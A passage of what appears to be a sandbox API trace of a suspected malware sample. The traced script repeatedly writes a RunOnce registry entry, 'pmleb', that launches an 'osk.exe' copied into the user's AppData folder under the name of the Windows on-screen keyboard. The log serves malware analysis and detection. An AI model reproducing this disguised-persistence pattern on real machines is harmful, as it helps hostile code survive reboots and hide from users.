wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.566] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.566] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.567] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0079.567] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.567] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x44 [0079.567] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.567] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x43 [0079.567] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.567] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.567] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.568] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.568] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.568] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.568] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.568] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.568] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.568] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.568] RegCloseKey (hKey=0x280) returned 0x0 [0079.568] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.568] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.568] SetTimer (hWnd=0x20280, nIDEvent=0x2043, uElapse=0xa, lpTimerFunc=0x0) returned 0x2043 [0079.568] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.582] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.582] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.582] KillTimer (hWnd=0x20280, uIDEvent=0x2043) returned 1 [0079.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.582] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.583] IUnknown:Release (This=0x787518) returned 0x1 [0079.583] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.583] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.583] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.583] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.583] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.583] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0079.583] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.583] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x45 [0079.583] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.584] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x44 [0079.584] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.584] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.584] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.584] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.584] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.584] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.584] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.584] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.585] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.585] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.585] RegCloseKey (hKey=0x280) returned 0x0 [0079.585] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.585] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.585] SetTimer (hWnd=0x20280, nIDEvent=0x2044, uElapse=0xa, lpTimerFunc=0x0) returned 0x2044 [0079.585] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.597] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.597] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.597] KillTimer (hWnd=0x20280, uIDEvent=0x2044) returned 1 [0079.597] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.597] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.597] IUnknown:Release (This=0x787518) returned 0x1 [0079.597] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.598] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.598] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.598] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.598] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.598] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0079.598] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.598] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x46 [0079.598] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.599] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x45 [0079.599] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.599] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.599] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.599] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.599] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.599] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.599] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.599] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.600] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.600] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.600] RegCloseKey (hKey=0x280) returned 0x0 [0079.600] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.600] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.600] SetTimer (hWnd=0x20280, nIDEvent=0x2045, uElapse=0xa, lpTimerFunc=0x0) returned 0x2045 [0079.600] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.612] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.612] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.612] KillTimer (hWnd=0x20280, uIDEvent=0x2045) returned 1 [0079.613] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.613] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.613] IUnknown:Release (This=0x787518) returned 0x1 [0079.613] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.613] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.613] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, 